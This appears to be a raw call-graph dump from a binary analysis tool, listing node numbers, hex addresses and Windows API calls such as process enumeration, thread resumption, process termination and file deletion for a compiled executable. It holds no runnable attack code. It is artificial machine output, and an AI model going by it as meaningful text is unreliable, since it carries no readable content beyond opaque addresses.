97876->97761 97878 2b3c43 97877->97878 97879 2b3e11 97877->97879 97880 2c1207 59 API calls 97878->97880 97883 2b3c54 97878->97883 97879->97863 97881 2b3e73 97880->97881 97882 2d2f70 67 API calls 97881->97882 97882->97883 97883->97863 97885 2d0fe6 59 API calls 97884->97885 97886 2c1228 97885->97886 97887 2d0fe6 59 API calls 97886->97887 97888 2c1236 97887->97888 97888->97871 97889->97870 97890->97876 97892 2c1a45 97891->97892 97893 2d0fe6 59 API calls 97892->97893 97894 2c1a83 97893->97894 97894->97768 97896 2d2e80 97895->97896 97903 2d3447 97896->97903 97902 2d2ea7 97902->97772 97920 2d9e3b 97903->97920 97905 2d2e89 97906 2d2eb8 DecodePointer DecodePointer 97905->97906 97907 2d2ee5 97906->97907 97908 2d2e95 97906->97908 97907->97908 97965 2d89d4 59 API calls 97907->97965 97917 2d2eb2 97908->97917 97910 2d2f48 EncodePointer EncodePointer 97910->97908 97911 2d2ef7 97911->97910 97912 2d2f1c 97911->97912 97966 2d8a94 61 API calls 97911->97966 97912->97908 97915 2d2f36 EncodePointer 97912->97915 97967 2d8a94 61 API calls 97912->97967 97915->97910 97916 2d2f30 97916->97908 97916->97915 97968 2d3450 97917->97968 97921 2d9e4c 97920->97921 97922 2d9e5f EnterCriticalSection 97920->97922 97927 2d9ec3 97921->97927 97922->97905 97924 2d9e52 97924->97922 97951 2d32e5 58 API calls 97924->97951 97928 2d9ecf 97927->97928 97929 2d9ed8 97928->97929 97930 2d9ef0 97928->97930 97952 2da39b 58 API calls 97929->97952 97939 2d9f11 97930->97939 97954 2d8a4d 58 API calls 97930->97954 97932 2d9edd 97953 2da3f8 58 API calls 97932->97953 97935 2d9f05 97937 2d9f0c 97935->97937 97938 2d9f1b 97935->97938 97936 2d9ee4 97940 2d32cf 3 API calls 97936->97940 97955 2d8d58 58 API calls 97937->97955 97942 2d9e3b 58 API calls 97938->97942 97939->97924 97944 2d9eee 97940->97944 97943 2d9f22 97942->97943 97945 2d9f2f 97943->97945 97946 2d9f47 97943->97946 97944->97930 97956 2da05b InitializeCriticalSectionAndSpinCount 97945->97956 97957 2d2f85 97946->97957 97949 2d9f3b 97963 2d9f63 LeaveCriticalSection 97949->97963 97952->97932 97953->97936 97954->97935 97955->97939 97956->97949 97958 2d2f8e RtlFreeHeap 97957->97958 97959 2d2fb7 97957->97959 97958->97959 97960 2d2fa3 97958->97960 97959->97949 97964 2d8d58 58 API calls 97960->97964 97962 2d2fa9 GetLastError 97962->97959 97963->97939 97964->97962 97965->97911 97966->97912 97967->97916 97971 2d9fa5 LeaveCriticalSection 97968->97971 97970 2d2eb7 97970->97902 97971->97970 97972->97784 97973 2eb7ad 97976 2bad98 97973->97976 97977 2f2f63 DestroyWindow 97976->97977 97978 2badd7 mciSendStringW 97976->97978 97991 2f2f6f 97977->97991 97979 2badf3 97978->97979 97980 2bafc0 97978->97980 97981 2bae01 97979->97981 97979->97991 97980->97979 97982 2bafcf UnregisterHotKey 97980->97982 98010 2bc71f 97981->98010 97982->97980 97984 2f2fb4 97989 2f2fc7 FreeLibrary 97984->97989 97990 2f2fd8 97984->97990 97986 2f2f8d FindClose 97986->97991 97987 2bae16 97987->97990 97998 2bae24 97987->97998 97989->97984 97992 2f2fec VirtualFree 97990->97992 97999 2bae91 97990->97999 97991->97984 97991->97986 98016 2c42cf 97991->98016 97992->97990 97993 2bae80 CoUninitialize 97993->97999 97994 2bae9c 97996 2baeac 97994->97996 97995 2f3033 98000 2f3042 97995->98000 98020 31a240 CloseHandle 97995->98020 98014 2cfef1 61 API calls 97996->98014 97998->97993 97999->97994 97999->97995 98006 2f3056 98000->98006 98021 30d5cb 59 API calls 98000->98021 98002 2baec2 98015 2d052f 59 API calls 98002->98015 98006->98006 98011 2bc72e 98010->98011 98012 2bae08 98011->98012 98022 30e0aa 59 API calls 98011->98022 98012->97984 98012->97987 98014->98002 98017 2c42e8 98016->98017 98018 2c42d9 98016->98018 98017->98018 98019 2c42ed CloseHandle 98017->98019 98018->97991 98019->98018 98020->97995 98021->98000 98022->98011 98023 2b9a6c 98026 2b829c 98023->98026 98025 2b9a78 98027 2b82b4 98026->98027 98034 2b8308 98026->98034 98028 2b53b0 275 API calls 98027->98028 98027->98034 98032 2b82eb 98028->98032 98030 2f0ed8 98030->98030 98031 2b8331 98031->98025 98032->98031 98033 2b523c 59 API calls 98032->98033 98033->98034 98034->98031 98035 31a48d 89 API calls 98034->98035 98035->98030 98036 2b1066 98041 2baaaa 98036->98041 98038 2b106c 98039 2d2f70 67 API calls 98038->98039 98040 2b1076 98039->98040 98042 2baacb 98041->98042 98074 2d02eb 98042->98074 98046 2bab12 98047 2c1207 59 API calls 98046->98047 98048 2bab1c 98047->98048 98049 2c1207 59 API calls 98048->98049 98050 2bab26 98049->98050 98051 2c1207 59 API calls 98050->98051 98052 2bab30 98051->98052 98053 2c1207 59 API calls 98052->98053 98054 2bab6e 98053->98054 98055 2c1207 59 API calls 98054->98055 98056 2bac39 98055->98056 98084 2d0588 98056->98084 98060 2bac6b 98061 2c1207 59 API calls 98060->98061 98062 2bac75 98061->98062 98112 2cfe2b 98062->98112 98064 2bacbc 98065 2baccc GetStdHandle 98064->98065 98066 2bad18 98065->98066 98067 2f2f39 98065->98067 98068 2bad20 OleInitialize 98066->98068 98067->98066 98069 2f2f42 98067->98069 98068->98038 98119 3170f3 64 API calls 98069->98119 98071 2f2f49 98120 3177c2 CreateThread 98071->98120 98073 2f2f55 CloseHandle 98073->98068 98121 2d03c4 98074->98121 98077 2d03c4 59 API calls 98078 2d032d 98077->98078 98079 2c1207 59 API calls 98078->98079 98080 2d0339 98079->98080 98128 2c1821 98080->98128 98082 2baad1 98083 2d07bb 6 API calls 98082->98083 98083->98046 98085 2c1207 59 API calls 98084->98085 98086 2d0598 98085->98086 98087 2c1207 59 API calls 98086->98087 98088 2d05a0 98087->98088 98149 2c10c3 98088->98149 98091 2c10c3 59 API calls 98092 2d05b0 98091->98092 98093 2c1207 59 API calls 98092->98093 98094 2d05bb 98093->98094 98095 2d0fe6 59 API calls 98094->98095 98096 2bac43 98095->98096 98097 2cff4c 98096->98097 98098 2cff5a 98097->98098 98099 2c1207 59 API calls 98098->98099 98100 2cff65 98099->98100 98101 2c1207 59 API calls 98100->98101 98102 2cff70 98101->98102 98103 2c1207 59 API calls 98102->98103 98104 2cff7b 98103->98104 98105 2c1207 59 API calls 98104->98105 98106 2cff86 98105->98106 98107 2c10c3 59 API calls 98106->98107 98108 2cff91 98107->98108 98109 2d0fe6 59 API calls 98108->98109 98110 2cff98 RegisterWindowMessageW 98109->98110 98110->98060 98113 2cfe3b 98112->98113 98114 30620c 98112->98114 98115 2d0fe6 59 API calls 98113->98115 98152 31a12a 59 API calls 98114->98152 98117 2cfe43 98115->98117 98117->98064 98118 306217 98119->98071 98120->98073 98153 3177a8 65 API calls 98120->98153 98122 2c1207 59 API calls 98121->98122 98123 2d03cf 98122->98123 98124 2c1207 59 API calls 98123->98124 98125 2d03d7 98124->98125 98126 2c1207 59 API calls 98125->98126 98127 2d0323 98126->98127 98127->98077 98129 2c182d 98128->98129 98130 2c189a 98128->98130 98132 2c1868 98129->98132 98133 2c1843 98129->98133 98141 2c1981 98130->98141 98138 2c1c7e 98132->98138 98137 2c1b7c 59 API calls 98133->98137 98136 2c184b 98136->98082 98137->98136 98139 2d0fe6 59 API calls 98138->98139 98140 2c1c88 98139->98140 98140->98136 98142 2c198f 98141->98142 98144 2c1998 98141->98144 98142->98144 98145 2c1aa4 98142->98145 98144->98136 98146 2c1ab7 98145->98146 98148 2c1ab4 98145->98148 98147 2d0fe6 59 API calls 98146->98147 98147->98148 98148->98144 98150 2c1207 59 API calls 98149->98150 98151 2c10cb 98150->98151 98151->98091 98152->98118 98154 2ee463 98166 2b373a 98154->98166 98156 2ee479 98157 2ee48f 98156->98157 98158 2ee4fa 98156->98158 98217 2b5376 60 API calls 98157->98217 98175 2bb020 98158->98175 98162 2ee4ce 98165 2ee4ee 98162->98165 98218 31890a 59 API calls 98162->98218 98163 2ef046 98165->98163 98219 31a48d 89 API calls 98165->98219 98167 2b3758 98166->98167 98168 2b3746 98166->98168 98170 2b375e 98167->98170 98171 2b3787 98167->98171 98169 2b523c 59 API calls 98168->98169 98174 2b3750 98169->98174 98173 2d0fe6 59 API calls 98170->98173 98172 2b523c 59 API calls 98171->98172 98172->98174 98173->98174 98174->98156 98220 2c3740 98175->98220 98178 2f30b6 98326 31a48d 89 API calls 98178->98326 98179 2bb07f 98179->98178 98181 2f30d4 98179->98181 98210 2bbb86 98179->98210 98214 2bb132 98179->98214 98327 31a48d 89 API calls 98181->98327 98183 2f355e 98216 2bb4dd 98183->98216 98337 31a48d 89 API calls 98183->98337 98184 2f318a 98184->98216 98329 31a48d 89 API calls 98184->98329 98189 2f3106 98189->98184 98328 2ba9de 275 API calls 98189->98328 98192 30730a 59 API calls 98192->98214 98193 2b3b31 59 API calls 98193->98214 98196 2b53b0 275 API calls 98196->98214 98197 2f3418 98198 2b53b0 275 API calls 98197->98198 98199 2f3448 98198->98199 98203 2b39be 68 API calls 98199->98203 98199->98216 98202 2b3ea3 68 API calls 98202->98214 98206 2f346f 98203->98206 98204 2f31c3 98330 31a48d 89 API calls 98204->98330 98205 2b3c30 68 API calls 98205->98214 98335 31a48d 89 API calls 98206->98335 98325 31a48d 89 API calls 98210->98325 98211 2d0fe6 59 API calls 98211->98214 98212 2b523c 59 API calls 98212->98214 98213 2c1c9c 59 API calls 98213->98214 98214->98183 98214->98189 98214->98192 98214->98193 98214->98196 98214->98197 98214->98202 98214->98204 98214->98205 98214->98206 98214->98210 98214->98211 98214->98212 98214->98213 98214->98216 98225 2b3add 98214->98225 98232 2bbc70 98214->98232 98309 2b3a40 98214->98309 98320 2b5190 98214->98320 98331 306c62 59 API calls 98214->98331 98332 32a9c3 85 API calls 98214->98332 98333 306c1e 59 API calls 98214->98333 98334 315ef2 68 API calls 98214->98334 98336 31a12a 59 API calls 98214->98336 98216->98165 98217->98162 98218->98165 98219->98163 98221 2c374f 98220->98221 98224 2c376a 98220->98224 98222 2c1aa4 59 API calls 98221->98222 98223 2c3757 CharUpperBuffW 98222->98223 98223->98224 98224->98179 98226 2ed3cd 98225->98226 98227 2b3aee 98225->98227 98228 2d0fe6 59 API calls 98227->98228 98229 2b3af5 98228->98229 98230 2b3b16 98229->98230 98338 2b3ba5 59 API calls 98229->98338 98230->98214 98233 2f359f 98232->98233 98239 2bbc95 98232->98239 98451 31a48d 89 API calls 98233->98451 98304 2bbca5 98239->98304 98452 2b5376 60 API calls 98239->98452 98453 30700c 275 API calls 98239->98453 98240 2bbf25 98247 2bbf3b 98240->98247 98420 2bc460 98240->98420 98243 2bc2ca LockWindowUpdate DestroyWindow GetMessageW 98244 2bc2fc 98243->98244 98243->98247 98245 2f4509 TranslateMessage DispatchMessageW GetMessageW 98244->98245 98245->98245 98245->98247 98246 2f36b3 Sleep 98246->98304 98247->98214 98248 2b5376 60 API calls 98248->98304 98249 2bbf54 timeGetTime 98249->98304 98250 2f405d WaitForSingleObject 98252 2f407d GetExitCodeProcess CloseHandle 98250->98252 98250->98304 98262 2bc36b 98252->98262 98253 2c1c9c 59 API calls 98253->98304 98254 2c1207 59 API calls 98285 2f3895 98254->98285 98255 2bc210 Sleep 98255->98304 98256 2d0fe6 59 API calls 98256->98304 98257 2f43a9 Sleep 98257->98285 98260 2b6cd8 253 API calls 98260->98304 98262->98214 98263 2bc324 timeGetTime 98450 2b5376 60 API calls 98263->98450 98268 2f4440 GetExitCodeProcess 98273 2f446c CloseHandle 98268->98273 98274 2f4456 WaitForSingleObject 98268->98274 98269 336562 110 API calls 98269->98285 98271 2b6d79 109 API calls 98271->98304 98273->98285 98274->98273 98274->98304 98275 2f38aa Sleep 98275->98304 98276 2f44c8 Sleep 98276->98304 98279 2c1a36 59 API calls 98279->98285 98282 2b3ea3 68 API calls 98282->98285 98284 2bc26d 98288 2c1a36 59 API calls 98284->98288 98285->98254 98285->98262 98285->98268 98285->98269 98285->98275 98285->98276 98285->98279 98285->98282 98285->98304 98477 312baf 60 API calls 98285->98477 98478 2b5376 60 API calls 98285->98478 98479 2b6cd8 275 API calls 98285->98479 98521 2d083e timeGetTime 98285->98521 98522 314148 CreateToolhelp32Snapshot Process32FirstW 98285->98522 98286 2bb020 253 API calls 98286->98304 98288->98240 98290 2c1a36 59 API calls 98290->98304 98293 2b53b0 253 API calls 98293->98304 98294 2b39be 68 API calls 98294->98304 98295 2b3a40 59 API calls 98295->98304 98296 306cf1 59 API calls 98296->98304 98297 31a48d 89 API calls 98297->98304 98298 2f3e13 VariantClear 98298->98304 98299 2f3ea9 VariantClear 98299->98304 98300 2b41c4 59 API calls 98300->98304 98301 2f3c57 VariantClear 98301->98304 98302 307aad 59 API calls 98302->98304 98303 2b3ea3 68 API calls 98303->98304 98304->98240 98304->98246 98304->98248 98304->98249 98304->98250 98304->98253 98304->98255 98304->98256 98304->98257 98304->98260 98304->98262 98304->98263 98304->98271 98304->98284 98304->98285 98304->98286 98304->98290 98304->98293 98304->98294 98304->98295 98304->98296 98304->98297 98304->98298 98304->98299 98304->98300 98304->98301 98304->98302 98304->98303 98305 2b5190 59 API calls 98304->98305 98339 2b52b0 98304->98339 98348 2b9a00 98304->98348 98355 2b9c80 98304->98355 98386 2ba820 98304->98386 98403 32e60c 98304->98403 98406 31c270 98304->98406 98413 3364b2 98304->98413 98439 3157ff 98304->98439 98449 2d083e timeGetTime 98304->98449 98454 336655 59 API calls 98304->98454 98455 31a058 59 API calls 98304->98455 98456 30e0aa 59 API calls 98304->98456 98457 2b4d37 98304->98457 98475 306c62 59 API calls 98304->98475 98476 2b38ff 59 API calls 98304->98476 98480 32c355 98304->98480 98520 3070e2 59 API calls 98304->98520 98305->98304 98310 2ed3b1 98309->98310 98313 2b3a53 98309->98313 98311 2ed3c1 98310->98311 98949 306d17 59 API calls 98310->98949 98314 2b3a7d 98313->98314 98319 2b3a9a 98313->98319 98941 2b3b31 98313->98941 98316 2b3a83 98314->98316 98317 2b3b31 59 API calls 98314->98317 98318 2b5190 59 API calls 98316->98318 98316->98319 98317->98316 98318->98319 98319->98214 98322 2b519b 98320->98322 98321 2b51d2 98321->98214 98322->98321 98950 2b41c4 59 API calls 98322->98950 98324 2b51fd 98324->98214 98325->98178 98326->98216 98327->98216 98328->98184 98329->98216 98330->98216 98331->98214 98332->98214 98333->98214 98334->98214 98335->98216 98336->98214 98337->98216 98338->98230 98340 2b52c6 98339->98340 98342 2b5313 98339->98342 98341 2b52d3 PeekMessageW 98340->98341 98340->98342 98341->98342 98343 2b52ec 98341->98343 98342->98343 98345 2edf68 TranslateAcceleratorW 98342->98345 98346 2b533e PeekMessageW 98342->98346 98347 2b5352 TranslateMessage DispatchMessageW 98342->98347 98532 2b359e 98342->98532 98343->98304 98345->98342 98345->98346 98346->98342 98346->98343 98347->98346 98349 2b9a1d 98348->98349 98350 2b9a31 98348->98350 98537 2b94e0 98349->98537 98571 31a48d 89 API calls 98350->98571 98353 2b9a28 98353->98304 98354 2f2478 98354->98354 98356 2b9cb5 98355->98356 98357 2f247d 98356->98357 98359 2b9d1f 98356->98359 98369 2b9d79 98356->98369 98358 2b53b0 275 API calls 98357->98358 98360 2f2492 98358->98360 98362 2c1207 59 API calls 98359->98362 98359->98369 98384 2b9f50 98360->98384 98580 31a48d 89 API calls 98360->98580 98361 2c1207 59 API calls 98361->98369 98364 2f24d8 98362->98364 98366 2d2f70 67 API calls 98364->98366 98365 2d2f70 67 API calls 98365->98369 98366->98369 98367 2f24fa 98367->98304 98368 2b39be 68 API calls 98368->98384 98369->98361 98369->98365 98369->98367 98372 2b9f3a 98369->98372 98369->98384 98370 2b53b0 275 API calls 98370->98384 98372->98384 98581 31a48d 89 API calls 98372->98581 98373 2ba775 98585 31a48d 89 API calls 98373->98585 98376 2b5190 59 API calls 98376->98384 98377 2f27f9 98377->98304 98378 2b4230 59 API calls 98378->98384 98382 31a48d 89 API calls 98382->98384 98384->98368 98384->98370 98384->98373 98384->98376 98384->98378 98384->98382 98385 2ba058 98384->98385 98579 2c1bcc 59 API calls 98384->98579 98582 307aad 59 API calls 98384->98582 98583 32ccac 275 API calls 98384->98583 98584 32bc26 275 API calls 98384->98584 98586 329ab0 275 API calls 98384->98586 98385->98304 98387 2f2d51 98386->98387 98390 2ba84c 98386->98390 98588 31a48d 89 API calls 98387->98588 98389 2f2d62 98389->98304 98391 2f2d6a 98390->98391 98398 2ba888 98390->98398 98589 31a48d 89 API calls 98391->98589 98392 2ba962 98396 2ba975 98392->98396 98587 32a9c3 85 API calls 98392->98587 98395 2d0fe6 59 API calls 98395->98398 98396->98304 98397 2f2dae 98590 2ba9de 275 API calls 98397->98590 98398->98392 98398->98395 98398->98396 98398->98397 98400 2b53b0 275 API calls 98398->98400 98401 2f2dc8 98398->98401 98400->98398 98401->98396 98591 31a48d 89 API calls 98401->98591 98592 32d1c6 98403->98592 98405 32e61c 98405->98304 98407 2b4d37 84 API calls 98406->98407 98408 31c286 98407->98408 98716 314005 98408->98716 98410 31c28e 98411 31c292 GetLastError 98410->98411 98412 31c2a7 98410->98412 98411->98412 98412->98304 98845 3365c1 98413->98845 98415 3364c0 98416 2bbc70 275 API calls 98415->98416 98417 3364eb 98416->98417 98418 2b523c 59 API calls 98417->98418 98419 336503 98418->98419 98419->98304 98863 2d02d4 98420->98863 98422 2bc2b6 98422->98247 98427 2bc483 98422->98427 98423 2bc46d 98423->98422 98425 2f45dc 98423->98425 98867 3177eb 7 API calls 98425->98867 98868 3177eb 7 API calls 98425->98868 98428 2c1a36 59 API calls 98427->98428 98429 2bc4ad 98428->98429 98430 2b3ea3 68 API calls 98429->98430 98431 2bc4c2 98430->98431 98432 2c1a36 59 API calls 98431->98432 98433 2bc4ef 98432->98433 98434 2b3ea3 68 API calls 98433->98434 98437 2bc500 98434->98437 98435 2bc524 98435->98243 98437->98435 98870 2b5376 60 API calls 98437->98870 98871 30700c 275 API calls 98437->98871 98440 31587d 98439->98440 98441 31580c 98439->98441 98440->98304 98442 31580e Sleep 98441->98442 98444 315817 QueryPerformanceCounter 98441->98444 98442->98440 98444->98442 98445 315825 QueryPerformanceFrequency 98444->98445 98446 31582f Sleep QueryPerformanceCounter 98445->98446 98447 315870 98446->98447 98447->98446 98448 315874 98447->98448 98448->98440 98449->98304 98450->98304 98451->98239 98452->98239 98453->98239 98454->98304 98455->98304 98456->98304 98458 2b4d51 98457->98458 98470 2b4d4b 98457->98470 98459 2edb28 98458->98459 98460 2eda2f 98458->98460 98461 2b4d99 98458->98461 98463 2b4d57 98458->98463 98464 2edaa7 98460->98464 98468 2d0fe6 59 API calls 98460->98468 98872 2d38c8 83 API calls 98461->98872 98466 2d0fe6 59 API calls 98463->98466 98873 2d38c8 83 API calls 98464->98873 98467 2b4d71 98466->98467 98469 2c1a36 59 API calls 98467->98469 98467->98470 98471 2eda74 98468->98471 98469->98470 98470->98304 98472 2d0fe6 59 API calls 98471->98472 98473 2eda9a 98472->98473 98473->98464 98474 2c1a36 59 API calls 98473->98474 98474->98464 98475->98304 98476->98304 98477->98285 98478->98285 98479->98285 98481 32c380 98480->98481 98482 32c39a 98480->98482 98901 31a48d 89 API calls 98481->98901 98874 32a8fd 98482->98874 98486 2b53b0 274 API calls 98487 32c406 98486->98487 98488 32c498 98487->98488 98492 32c447 98487->98492 98513 32c392 98487->98513 98489 32c4ee 98488->98489 98490 32c49e 98488->98490 98491 2b4d37 84 API calls 98489->98491 98489->98513 98902 317ed5 59 API calls 98490->98902 98493 32c500 98491->98493 98497 31789a 59 API calls 98492->98497 98495 2c1aa4 59 API calls 98493->98495 98498 32c524 CharUpperBuffW 98495->98498 98496 32c4c1 98903 2c35b9 59 API calls 98496->98903 98500 32c477 98497->98500 98503 32c53e 98498->98503 98502 306ebc 274 API calls 98500->98502 98501 32c4c9 98507 2bb020 274 API calls 98501->98507 98502->98513 98504 32c591 98503->98504 98505 32c545 98503->98505 98506 2b4d37 84 API calls 98504->98506 98881 31789a 98505->98881 98508 32c599 98506->98508 98507->98513 98904 2b5376 60 API calls 98508->98904 98513->98304 98514 32c5a3 98514->98513 98515 2b4d37 84 API calls 98514->98515 98516 32c5be 98515->98516 98905 2c35b9 59 API calls 98516->98905 98518 32c5ce 98519 2bb020 274 API calls 98518->98519 98519->98513 98520->98304 98521->98285 98932 314ce2 98522->98932 98524 31418e 98525 314195 Process32NextW 98524->98525 98526 314244 CloseHandle 98524->98526 98527 2c1207 59 API calls 98524->98527 98528 2c1a36 59 API calls 98524->98528 98529 2d0119 59 API calls 98524->98529 98530 2c17e0 59 API calls 98524->98530 98938 2c151f 61 API calls 98524->98938 98525->98524 98525->98526 98526->98285 98527->98524 98528->98524 98529->98524 98530->98524 98533 2b35e2 98532->98533 98534 2b35b0 98532->98534 98533->98342 98534->98533 98535 2b35d5 IsDialogMessageW 98534->98535 98536 2ed273 GetClassLongW 98534->98536 98535->98533 98535->98534 98536->98534 98536->98535 98538 2b53b0 275 API calls 98537->98538 98539 2b951f 98538->98539 98540 2f2001 98539->98540 98554 2b9527 98539->98554 98541 2b5190 59 API calls 98540->98541 98546 2b9944 98541->98546 98542 2f22c0 98578 31a48d 89 API calls 98542->98578 98544 2f22de 98544->98544 98545 2b9583 98545->98353 98548 2d0fe6 59 API calls 98546->98548 98547 2b986a 98549 2b987f 98547->98549 98550 2f22b1 98547->98550 98561 2b96e3 98548->98561 98552 2d0fe6 59 API calls 98549->98552 98577 32a983 59 API calls 98550->98577 98564 2b977d 98552->98564 98553 2d0fe6 59 API calls 98553->98554 98554->98542 98554->98545 98554->98546 98554->98553 98555 2b96cf 98554->98555 98570 2b9741 98554->98570 98555->98546 98557 2b96dc 98555->98557 98556 2d0fe6 59 API calls 98559 2b970e 98556->98559 98558 2d0fe6 59 API calls 98557->98558 98558->98561 98559->98570 98572 2bcca0 275 API calls 98559->98572 98560 2f22a0 98576 31a48d 89 API calls 98560->98576 98561->98556 98561->98559 98561->98570 98564->98353 98566 2f2278 98575 31a48d 89 API calls 98566->98575 98568 2f2253 98574 31a48d 89 API calls 98568->98574 98570->98547 98570->98560 98570->98564 98570->98566 98570->98568 98573 2b8180 275 API calls 98570->98573 98571->98354 98572->98570 98573->98570 98574->98564 98575->98564 98576->98564 98577->98542 98578->98544 98579->98384 98580->98384 98581->98384 98582->98384 98583->98384 98584->98384 98585->98377 98586->98384 98587->98396 98588->98389 98589->98396 98590->98401 98591->98396 98593 2b4d37 84 API calls 98592->98593 98594 32d203 98593->98594 98596 32d24a 98594->98596 98630 32de8e 98594->98630 98596->98405 98597 32d617 98680 32dfb1 92 API calls 98597->98680 98600 32d4b0 98643 32d057 98600->98643 98601 32d626 98601->98600 98603 32d632 98601->98603 98602 2b4d37 84 API calls 98619 32d29b 98602->98619 98603->98596 98608 32d4e9 98658 2d0e38 98608->98658 98611 32d503 98665 31a48d 89 API calls 98611->98665 98612 32d51c 98666 2b47be 98612->98666 98615 32d50e GetCurrentProcess TerminateProcess 98615->98612 98616 32d4a2 98616->98597 98616->98600 98619->98596 98619->98602 98619->98616 98663 31fc0d 59 API calls 98619->98663 98664 32d6c8 61 API calls 98619->98664 98622 32d68d 98622->98596 98626 32d6a1 FreeLibrary 98622->98626 98623 32d554 98678 32dd32 107 API calls 98623->98678 98626->98596 98628 32d565 98628->98622 98629 2b523c 59 API calls 98628->98629 98679 2b4230 59 API calls 98628->98679 98681 32dd32 107 API calls 98628->98681 98629->98628 98631 2c1aa4 59 API calls 98630->98631 98632 32dea9 CharLowerBuffW 98631->98632 98682 30f903 98632->98682 98636 2c1207 59 API calls 98637 32dee2 98636->98637 98689 2c1462 98637->98689 98639 32def9 98640 2c1981 59 API calls 98639->98640 98641 32df05 98640->98641 98642 32df41 98641->98642 98702 32d6c8 61 API calls 98641->98702 98642->98619 98644 32d072 98643->98644 98648 32d0c7 98643->98648 98645 2d0fe6 59 API calls 98644->98645 98647 32d094 98645->98647 98646 2d0fe6 59 API calls 98646->98647 98647->98646 98647->98648 98649 32e139 98648->98649 98650 32e362 98649->98650 98656 32e15c 98649->98656 98650->98608 98651 2b5087 59 API calls 98651->98656 98652 2b50d5 59 API calls 98652->98656 98653 2b502b 59 API calls 98653->98656 98654 2b4d37 84 API calls 98654->98656 98655 2d593c 58 API calls 98655->98656 98656->98650 98656->98651 98656->98652 98656->98653 98656->98654 98656->98655 98706 315e42 61 API calls 98656->98706 98659 2d0e4d 98658->98659 98660 2d0ee5 NtResumeThread 98659->98660 98661 2d0eb3 98659->98661 98662 2d0ed3 CloseHandle 98659->98662 98660->98661 98661->98611 98661->98612 98662->98661 98663->98619 98664->98619 98665->98615 98667 2b47c6 98666->98667 98668 2d0fe6 59 API calls 98667->98668 98669 2b47d4 98668->98669 98670 2b47e0 98669->98670 98707 2b46ec 59 API calls 98669->98707 98672 2b4540 98670->98672 98708 2b4650 98672->98708 98674 2d0fe6 59 API calls 98675 2b45eb 98674->98675 98675->98628 98677 2b4230 59 API calls 98675->98677 98676 2b454f 98676->98674 98676->98675 98677->98623 98678->98628 98679->98628 98680->98601 98681->98628 98683 30f92e 98682->98683 98686 30f963 98683->98686 98687 30fa14 98683->98687 98688 30f96d 98683->98688 98686->98688 98703 2c14db 61 API calls 98686->98703 98687->98688 98704 2c14db 61 API calls 98687->98704 98688->98636 98688->98641 98690 2c14ce 98689->98690 98691 2c1471 98689->98691 98693 2c1981 59 API calls 98690->98693 98691->98690 98692 2c147c 98691->98692 98695 2ff1de 98692->98695 98696 2c1497 98692->98696 98694 2c149f 98693->98694 98694->98639 98698 2c1c7e 59 API calls 98695->98698 98705 2c1b7c 59 API calls 98696->98705 98699 2ff1e8 98698->98699 98700 2d0fe6 59 API calls 98699->98700 98701 2ff208 98700->98701 98702->98642 98703->98686 98704->98687 98705->98694 98706->98656 98707->98670 98709 2b4659 98708->98709 98710 2ed6ec 98709->98710 98715 2b4663 98709->98715 98711 2d0fe6 59 API calls 98710->98711 98713 2ed6f8 98711->98713 98712 2b466a 98712->98676 98714 2b5190 59 API calls 98714->98715 98715->98712 98715->98714 98717 2c1207 59 API calls 98716->98717 98718 314024 98717->98718 98719 2c1207 59 API calls 98718->98719 98720 31402d 98719->98720 98721 2c1207 59 API calls 98720->98721 98722 314036 98721->98722 98740 2d0284 98722->98740 98727 31405c 98752 2d0119 98727->98752 98728 2c1900 59 API calls 98728->98727 98730 314070 FindFirstFileW 98731 3140fc FindClose 98730->98731 98732 31408f 98730->98732 98736 314107 98731->98736 98732->98731 98733 3140d7 FindNextFileW 98732->98733 98734 2c1c9c 59 API calls 98732->98734 98803 2c17e0 98732->98803 98812 2c1900 98732->98812 98733->98732 98734->98732 98736->98410 98739 3140f3 FindClose 98739->98736 98819 2e1b70 98740->98819 98743 2d02cd 98825 2c19e1 98743->98825 98744 2d02b0 98745 2c1821 59 API calls 98744->98745 98747 2d02bc 98745->98747 98821 2c133d 98747->98821 98750 314fec GetFileAttributesW 98751 31404a 98750->98751 98751->98727 98751->98728 98753 2c1207 59 API calls 98752->98753 98754 2d012f 98753->98754 98755 2c1207 59 API calls 98754->98755 98756 2d0137 98755->98756 98757 2c1207 59 API calls 98756->98757 98758 2d013f 98757->98758 98759 2c1207 59 API calls 98758->98759 98760 2d0147 98759->98760 98761 2d017b 98760->98761 98762 30627d 98760->98762 98763 2c1462 59 API calls 98761->98763 98764 2c1c9c 59 API calls 98762->98764 98765 2d0189 98763->98765 98766 306286 98764->98766 98767 2c1981 59 API calls 98765->98767 98768 2c19e1 59 API calls 98766->98768 98769 2d0193 98767->98769 98771 2d01be 98768->98771 98770 2c1462 59 API calls 98769->98770 98769->98771 98774 2d01b4 98770->98774 98772 2d01fe 98771->98772 98775 2d01dd 98771->98775 98785 3062a6 98771->98785 98773 2c1462 59 API calls 98772->98773 98777 2d020f 98773->98777 98778 2c1981 59 API calls 98774->98778 98829 2c1609 98775->98829 98781 2d0221 98777->98781 98783 2c1c9c 59 API calls 98777->98783 98778->98771 98779 306376 98782 2c1821 59 API calls 98779->98782 98784 2d0231 98781->98784 98787 2c1c9c 59 API calls 98781->98787 98798 306333 98782->98798 98783->98781 98789 2d0238 98784->98789 98790 2c1c9c 59 API calls 98784->98790 98785->98779 98788 30635f 98785->98788 98797 3062dd 98785->98797 98786 2c1462 59 API calls 98786->98772 98787->98784 98788->98779 98794 30634a 98788->98794 98791 2c1c9c 59 API calls 98789->98791 98800 2d023f 98789->98800 98790->98789 98791->98800 98792 2c1609 59 API calls 98792->98798 98793 30633b 98795 2c1821 59 API calls 98793->98795 98796 2c1821 59 API calls 98794->98796 98795->98798 98796->98798 98797->98793 98801 306326 98797->98801 98798->98772 98798->98792 98832 2c153b 59 API calls 98798->98832 98800->98730 98802 2c1821 59 API calls 98801->98802 98802->98798 98804 2ff401 98803->98804 98805 2c17f2 98803->98805 98839 3087f9 59 API calls 98804->98839 98833 2c1680 98805->98833 98808 2c17fe 98808->98732 98809 2ff40b 98810 2c1c9c 59 API calls 98809->98810 98811 2ff413 98810->98811 98813 2c1914 98812->98813 98814 2ff534 98812->98814 98840 2c18a5 98813->98840 98815 2c1c7e 59 API calls 98814->98815 98817 2ff53f 98815->98817 98818 2c191f DeleteFileW 98818->98733 98818->98739 98820 2d0291 GetFullPathNameW 98819->98820 98820->98743 98820->98744 98822 2c134b 98821->98822 98823 2c1981 59 API calls 98822->98823 98824 2c135b 98823->98824 98824->98750 98826 2c19fb 98825->98826 98828 2c19ee 98825->98828 98827 2d0fe6 59 API calls 98826->98827 98827->98828 98828->98747 98830 2c1aa4 59 API calls 98829->98830 98831 2c1614 98830->98831 98831->98772 